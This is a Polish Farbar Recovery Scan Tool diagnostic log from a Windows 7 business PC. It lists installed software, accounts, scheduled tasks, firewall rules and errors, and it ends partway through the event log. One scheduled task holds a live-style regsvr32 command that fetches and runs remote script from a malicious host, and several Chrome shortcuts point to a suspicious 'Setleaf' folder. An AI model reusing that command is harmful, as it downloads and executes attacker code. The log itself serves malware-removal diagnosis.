Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 28-05-2017 Uruchomiony przez Lareco (30-05-2017 15:25:19) Uruchomiony z C:\Instalki Windows 7 Professional Service Pack 1 (X64) (2015-12-19 16:30:02) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-3868839101-544848183-1789199905-500 - Administrator - Disabled) Gość (S-1-5-21-3868839101-544848183-1789199905-501 - Limited - Enabled) HomeGroupUser$ (S-1-5-21-3868839101-544848183-1789199905-1002 - Limited - Enabled) Lareco (S-1-5-21-3868839101-544848183-1789199905-1000 - Administrator - Enabled) => C:\Users\Lareco ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189} AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34} AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 24.0.0.180 - Adobe Systems Incorporated) Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.171 - Adobe Systems Incorporated) Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated) Adobe Reader XI MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.00 - Adobe Systems Incorporated) Ashampoo Burning Studio 6 FREE v.6.84 (HKLM-x32\...\{91B33C97-3ED1-03EA-A67B-244AA4D7B559}_is1) (Version: 6.8.4 - Ashampoo GmbH & Co. KG) BILANS Gofin 2016 1.0.6.0 (HKLM-x32\...\{fc86bc3e-e85d-40c4-8c11-a318873072e4}) (Version: 1.0.6.0 - Wydawnictwo Podatkowe GOFIN sp. z o.o.) BILANS Gofin 2016 1.0.6.0 (x32 Version: 1.0.6.0 - Wydawnictwo Podatkowe GOFIN sp. z o.o.) Hidden Comarch ERP Optima (HKLM-x32\...\Comarch ERP Optima) (Version: 2017.3.1.1203 - Comarch SA) Comarch ERP Optima (x32 Version: 2017.3.1.1203 - Comarch SA) Hidden Comarch ERP WMPAINT Fix (HKLM\...\{6713fee8-dd53-48f5-adc5-b5a0498bde48}.sdb) (Version: - ) Common Desktop Agent (Version: 1.62.0 - OEM) Hidden CryptoCard Suite (32/64 bit) (HKLM-x32\...\{d96fbaa0-b61f-4755-8854-381526209d43}) (Version: 2.1.170 - CryptoTech) CryptoCard Suite (64bit) (Version: 2.01.00170 - CryptoTech) Hidden CryptoCard Suite (x32 Version: 2.01.00170 - CryptoTech) Hidden Crystal Reports dla Comarch ERP Optima (HKLM-x32\...\Crystal Reports dla Comarch ERP Optima) (Version: 1.0.0.0 - Comarch SA) Crystal Reports dla Comarch ERP Optima (x32 Version: 1.0.0.0 - Comarch SA) Hidden DELEGACJE Krajowe i Zagraniczne wersja 2.80 (HKLM-x32\...\DELEGACJE Krajowe i Zagraniczne_is1) (Version: - ) DelegacjeSQL v.2.30.4 wersja bazy danych 139 (HKLM-x32\...\{7E06E20D-E637-40CA-A362-61596DB96F13}_is1) (Version: - INTER-SOFT) Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.8.0.66 - Dell Inc.) Dell Command | Update (HKLM-x32\...\{EC542D5D-B608-4145-A8F7-749C02BE6D94}) (Version: 2.1.0 - Dell Inc.) Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP) Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc) Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F173834}) (Version: 3.4.16100.0 - Dell Inc.) Dell Protected Workspace (HKLM-x32\...\{E2CAA395-66B3-4772-85E3-6134DBAB244E}) (Version: 4.0.18189 - Invincea, Inc.) Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.) Firebird 2.1.3.18185 (Win32) (HKLM-x32\...\FBDBServer_2_1_is1) (Version: 2.1.3.18185 - Firebird Project) Free PDF to Word Doc Converter v1.1 (HKLM-x32\...\Free PDF to Word Doc Converter_is1) (Version: 1.1 - www.hellopdf.com) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.) Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden iBard24 (HKLM-x32\...\{6CACB9AB-7A75-4E1B-8C71-D21F159B9B14}) (Version: 2.9.10.18637 - iComarch24 S.A.) Intel Security True Key (HKLM\...\TrueKey) (Version: 4.3.145.1 - Intel Security) Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.31.1000 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.4170 - Intel Corporation) Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.4.40 - Intel Corporation) Manager (x32 Version: 4.0.1.25166 - 2015 pdfforge GmbH. All rights reserved) Hidden Maxx Audio Installer (x64) (Version: 1.6.5073.107 - Waves Audio Ltd.) Hidden Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation) Microsoft Office 2013 dla Użytkowników Domowych i Małych Firm - pl-pl (HKLM\...\HomeBusinessRetail - pl-pl) (Version: 15.0.4927.1002 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation) Microsoft SkyDrive (HKU\S-1-5-21-3868839101-544848183-1789199905-1000\...\SkyDriveSetup.exe) (Version: 16.4.6012.0828 - Microsoft Corporation) Microsoft SQL Server 2005 Backward compatibility (HKLM\...\{8909B8A7-CEAB-4772-BF29-1892C4E6603B}) (Version: 8.05.2309 - Microsoft Corporation) Microsoft SQL Server 2008 R2 Command Line Utilities (HKLM\...\{D9F711D3-3C90-4D79-9292-47C90C722E2A}) (Version: 10.50.1600.1 - Microsoft Corporation) Microsoft SQL Server 2008 R2 Native Client (HKLM\...\{2180B33F-3225-423E-BBC1-7798CFD3CD1F}) (Version: 10.50.1600.1 - Microsoft Corporation) Microsoft SQL Server 2012 Management Objects (HKLM-x32\...\{DA1C1761-5F4F-4332-AB9D-29EDF3F8EA0A}) (Version: 11.0.2100.60 - Microsoft Corporation) Microsoft System CLR Types for SQL Server 2012 (HKLM-x32\...\{E2082604-4BA5-44BB-BBFB-AF0F3CB8C6AB}) (Version: 11.0.2100.60 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.) Mozilla Thunderbird 45.8.0 (x86 pl) (HKLM-x32\...\Mozilla Thunderbird 45.8.0 (x86 pl)) (Version: 45.8.0 - Mozilla) MSI to redistribute MS VS2005 CRT libraries (HKLM-x32\...\{A8D93648-9F7F-407D-915C-62044644C3DA}) (Version: 8.0.50727.42 - The Firebird Project) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4927.1002 - Microsoft Corporation) Hidden Office 15 Click-to-Run Licensing Component (Version: 15.0.4927.1002 - Microsoft Corporation) Hidden Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4927.1002 - Microsoft Corporation) Hidden PDF Architect 4 (HKLM-x32\...\PDF Architect 4) (Version: 4.0.34.26215 - pdfforge GmbH) PDF Architect 4 Create Module (Version: 4.0.12.26604 - pdfforge GmbH) Hidden PDF Architect 4 Edit Module (Version: 4.0.12.26604 - pdfforge GmbH) Hidden PDF Architect 4 View Module (Version: 4.0.12.26604 - pdfforge GmbH) Hidden PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.2.2 - pdfforge) PITy2015 IPS 1.7 kompilacja:1.7.3.9 (HKLM-x32\...\PITy2015IPS_is1) (Version: - IPS Przedsiębiorstwo Informatyczne) Płatnik 10.01.001 (HKLM-x32\...\{05381030-963D-4779-BECA-0D7D49268EDB}) (Version: 10.01.001 - Asseco Poland S.A.) Polski pakiet językowy dla narzędzi Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PLK) (Version: 10.0.50903 - Microsoft Corporation) Program Pit 2016 - wersja: 10.0.4.47 (HKLM-x32\...\Roczne rozliczenie podatku dochodowego - PIT Gofin 2016_is1) (Version: - Wydawnictwo Podatkowe GOFIN sp. z o.o.) Realtek Audio COM Components (HKLM-x32\...\{2355B503-9B11-4449-861D-1C1748B26320}) (Version: 1.0.2 - Realtek Semiconductor Corp.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6068 - Realtek Semiconductor Corp.) Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.81.00(2015-05-25) - Samsung Electronics Co., Ltd.) Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.) SQL DMO dla Comarch ERP Optima (HKLM-x32\...\SQL DMO dla Comarch ERP Optima) (Version: 1.0.0.0 - Comarch SA) SQL DMO dla Comarch ERP Optima (x32 Version: 1.0.0.0 - Comarch SA) Hidden SQLXML 3.0 SP3 (HKLM-x32\...\{19ABFD8F-CB86-4965-9282-047FC27084F1}) (Version: 3.30.3457.0 - Microsoft Corporation) Sterowniki firmy InsERT 5.19 (HKLM-x32\...\{E5CCEA56-DC84-440E-8785-D5A7A6B7FB39}) (Version: 5.19 - InsERT) TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.77242 - TeamViewer) TightVNC (HKLM\...\{D2372F87-7DA2-47F7-A102-AF2181B8EAA2}) (Version: 2.7.10.0 - GlavSoft LLC.) WRF (Płatnik) 1.03.002 (HKLM-x32\...\{460BE803-88CF-4FD2-9082-2450A5959959}) (Version: 1.03.002 - Asseco Poland S.A.) WRFKL 1.02.001 H (HKLM-x32\...\{A98C53C1-D7D5-43FE-82F4-EACD66292004}) (Version: 1.02.001 H - Asseco Poland S.A.) WRFSL 1.02.001 J (HKLM-x32\...\{98A95680-71E0-4C6B-B3D0-384193FCA4F6}) (Version: 1.02.001 J - Asseco Poland S.A.) Wtyczka e-Deklaracje (HKLM-x32\...\{81BF6353-3C5B-4E6E-A566-7E162A00BF72}_is1) (Version: 4.2.0 - Ministerstwo Finansów) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-3868839101-544848183-1789199905-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Lareco\AppData\Local\Microsoft\SkyDrive\16.4.6012.0828\amd64\SkyDriveShell64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-3868839101-544848183-1789199905-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Lareco\AppData\Local\Microsoft\SkyDrive\16.4.6012.0828\amd64\SkyDriveShell64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-3868839101-544848183-1789199905-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Lareco\AppData\Local\Microsoft\SkyDrive\16.4.6012.0828\amd64\SkyDriveShell64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-3868839101-544848183-1789199905-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Lareco\AppData\Local\Microsoft\SkyDrive\16.4.6012.0828\amd64\FileSyncApi64.dll (Microsoft Corporation) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {00E1CFD1-8495-4C86-9E16-A3CDFFBC103F} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-04-11] (Microsoft Corporation) Task: {05A9E5C5-4A87-4F01-81D4-938E639F875E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-21] (Google Inc.) Task: {1559D02D-C400-42F7-ACF1-E13DBA6EF2D1} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation) Task: {310397E1-07D2-4DCD-AE19-9C3C898C29BE} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-21] (Google Inc.) Task: {59BEB99E-C271-4376-BDB0-276EA360A713} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj83FURWRjqcMUEcRYI1NYM3FjzLMjH2FdZYRYIxRWqdRH== scrobj.dll Task: {762AF580-F691-4BB5-8543-B64BE04DAF00} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-06-25] (Adobe Systems Incorporated) Task: {8E44A692-DCAE-4CCB-B490-7E6B769CB3C3} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-03-21] (Realtek Semiconductor) Task: {C9B76950-633D-4546-9BBE-C180AFA51188} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-09] (Adobe Systems Incorporated) Task: {DFD9CC2E-61E0-46DE-86D9-B7B8203DB425} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-04-11] (Microsoft Corporation) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) Shortcut: C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Setleaf\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Setleaf\Application\chrome.exe (Google Inc.) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Setleaf\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Setleaf\Application\chrome.exe (Google Inc.) ==================== Załadowane moduły (filtrowane) ============== 2015-07-15 16:25 - 2015-07-15 16:25 - 00022528 _____ () C:\Windows\System32\ssa6mlm.dll 2015-12-28 10:13 - 2017-01-17 04:25 - 00117440 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll 2015-06-03 12:01 - 2015-06-03 12:01 - 00078336 _____ () C:\Program Files (x86)\iBard24\2.9.10.18637\RSyncLib.dll 2015-06-03 11:59 - 2015-06-03 11:59 - 00028672 _____ () C:\Program Files (x86)\iBard24\2.9.10.18637\iBard24.SMOWrapperV10.dll 2015-06-03 11:59 - 2015-06-03 11:59 - 00028672 _____ () C:\Program Files (x86)\iBard24\2.9.10.18637\iBard24.SMOWrapperV11.dll 2015-06-03 11:59 - 2015-06-03 11:59 - 00028672 _____ () C:\Program Files (x86)\iBard24\2.9.10.18637\iBard24.SMOWrapperV12.dll 2014-09-08 14:39 - 2014-09-08 14:39 - 00464608 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe 2014-09-08 14:38 - 2014-09-08 14:38 - 00051200 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrvPS.dll 2015-10-14 21:58 - 2015-04-14 04:12 - 00391784 _____ () C:\Windows\system32\igfxTray.exe 2014-11-10 12:12 - 2014-11-10 12:12 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll - - 00000000 _____ () c:\programdata\package cache\{e01cb7f1-3e88-4450-1764-b3cc1e205c4a}v10.1.14393.795\installers\30daf459e79c5d26366654b1b482e87.cab:dp 2015-10-14 13:54 - 2015-01-27 10:26 - 01905904 ____N () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll 2015-10-14 13:54 - 2012-11-25 22:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll 2015-10-14 13:54 - 2014-02-18 14:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:539 [0] AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:581 [0] AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:679 [0] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 04:34 - 2017-05-20 15:36 - 00000027 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-3868839101-544848183-1789199905-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Lareco\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 10.0.0.1 - 8.8.8.8 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\startupreg: EEDSpeedLauncher => rundll32.exe C:\Windows\system32\eed_ec.dll,SpeedLauncher MSCONFIG\startupreg: iBard24 => "C:\Program Files (x86)\iBard24\IBardClient.exe" -autostart ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [{69A394C7-AAB5-4A29-8C22-8B8241D754D6}] => (Allow) C:\Users\Lareco\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe FirewallRules: [{0B7FFF48-5B87-42F7-A4D4-B0097BB4DBA6}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe FirewallRules: [{9C5A1C2E-3952-434F-813B-D9B007B2764D}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe FirewallRules: [{8FE849FA-FBB2-46DB-83D4-DF006705EECA}] => (Allow) C:\Program Files\TightVNC\tvnserver.exe FirewallRules: [{67D38BD5-A0AE-4C7C-8479-77B173809C49}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{FBF766A8-A9F5-404F-A5AA-BF1D8794AC47}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe FirewallRules: [{CAF44BD2-56BB-42EB-97D0-3F7EA07C7901}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe FirewallRules: [{9A8E3F26-5083-475E-9A23-EA558BE5E109}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDS.Application.exe FirewallRules: [{4708007C-5511-44BE-9359-3A347029E28C}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\OrderSupplies.exe FirewallRules: [{FDB0154B-C29A-41C5-96E5-CF4D8F71AEEA}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDSAlert.exe FirewallRules: [{725CA7BE-3824-4A02-B72D-B65D1A9A0A5F}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\uninstall.exe FirewallRules: [{AB46C8FD-43CA-43BC-AF35-10F7A223E6F6}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\CDAS2PC.exe FirewallRules: [{55EEEB16-404B-4D38-8FF7-BF08C37A6392}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\ScanProcess.exe FirewallRules: [{1CE39466-3587-48E7-BBE0-C0DA18487C0B}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\Scan2PCNotify.exe FirewallRules: [{3B897E5B-3370-4237-9B98-DA0C6C9CC54E}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe FirewallRules: [{2653B954-FDC8-4B8C-A993-CE7CA8FD7591}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe FirewallRules: [{0043C472-81FB-4F39-9E83-A8AA0FAA9A7D}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe FirewallRules: [{DA2CA6E2-8C71-4C58-83D9-2D0BC63C7F9D}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe FirewallRules: [TCP Query User{64C7A4E9-21CE-4907-949D-C35FFD019877}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Block) C:\program files (x86)\samsung\easy printer manager\ids.application.exe FirewallRules: [UDP Query User{68774D74-8651-4AAA-B750-357D3FA14B95}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Block) C:\program files (x86)\samsung\easy printer manager\ids.application.exe FirewallRules: [{D7F4328C-F030-4806-BEF0-97B728139EEE}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe FirewallRules: [{3C3AA3DD-9F06-46BF-8B10-C82E0C6D4B6C}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe FirewallRules: [{70FFE525-0C1E-47E9-A269-E2426BF5ABF4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{4C1EB013-F3B6-437C-B4B6-7B4430252306}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{9ADA7D5F-D8FA-46F4-815C-59C87CC0A668}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{77BABD53-24C7-4D19-BE25-CF7971549C7F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{655B6149-D7C6-49E9-A319-90A134AE3F2A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{E75FFA4B-FC78-4CA5-BE2B-43940E08283B}] => (Allow) C:\Program Files (x86)\Setleaf\Application\chrome.exe FirewallRules: [{AE24E800-7B9F-4513-868E-B8212938ABEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{563DD3A2-248E-4668-9278-5F1B363839D7}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe ==================== Punkty Przywracania systemu ========================= 23-05-2017 14:59:52 Windows Update 29-05-2017 10:19:31 Windows Update ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Teredo Tunneling Pseudo-Interface Description: Karta tunelowania Teredo firmy Microsoft Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: tunnel Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (05/30/2017 08:14:21 AM) (Source: TrueKey) (EventID: 0) (User: ) Description: Failed to process session change. System.ArgumentException: Data Source cannot be empty. Use :memory: to open an in-memory database at System.Data.SQLite.SQLiteConnection.Open() at McAfee.YAP.Service.Data.McBioSQLite.GetConnection() at McAfee.YAP.Service.Data.McBioSQLite.StoreInServiceInfo(String key, String value) at McAfee.YAP.Service.Common.McBioBCAService.DisableSpoofingMode() at McAfee.YAP.Service.Service.OnSessionChange(SessionChangeDescription changeDescription) at System.ServiceProcess.ServiceBase.DeferredSessionChange(Int32 eventType, Int32 sessionId) Error: (05/30/2017 08:13:49 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/30/2017 08:13:12 AM) (Source: Aktualizacja Programu Płatnik) (EventID: 0) (User: ) Description: Service cannot be started. Nieprawidłowe dojście Error: (05/30/2017 08:08:35 AM) (Source: FirebirdGuardianDefaultInstance) (EventID: 281) (User: ) Description: Event-ID 281 Error: (05/29/2017 10:09:43 